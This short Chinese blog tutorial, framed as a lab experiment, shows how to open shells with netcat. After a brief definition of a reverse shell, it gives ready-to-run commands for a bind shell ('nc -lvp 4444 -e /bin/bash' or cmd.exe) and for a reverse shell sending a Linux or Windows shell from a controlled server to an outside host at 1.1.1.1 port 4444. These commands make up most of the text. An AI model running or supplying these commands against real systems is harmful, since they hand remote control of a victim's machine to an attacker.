利用nc反彈shell實驗

反彈shell
反彈shell(reverse shell),就是控制端監聽在某TCP/UDP端口,被控端發起請求到該端口,並將其命令行的輸入輸出轉到控制端。reverse shell與telnet,ssh等標準shell對應,本質上是網絡概念的客戶端與服務端的角色反轉。

利用nc正向連接shell實驗
步驟一:被控服務器shell反彈到本地的4444端口,並監聽4444端口
nc –lvp 4444 –e /bin/bash
nc –lvp 4444 -e cmd.exe
在這裏插入圖片描述

步驟二:攻擊機連接被控服務器的4444端口
nc -vv 被控服務器ip 4444
在這裏插入圖片描述

利用nc反彈shell實驗
步驟一:外網服務器監聽4444端口
nc -lvp 4444
在這裏插入圖片描述

步驟二:在被控服務器反彈shell到外網服務器的4444端口
nc -vv 1.1.1.1 4444 –e /bin/bash (反彈linux shell)
nc -vv 1.1.1.1 4444 –e cmd.exe(反彈windows shell)
在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章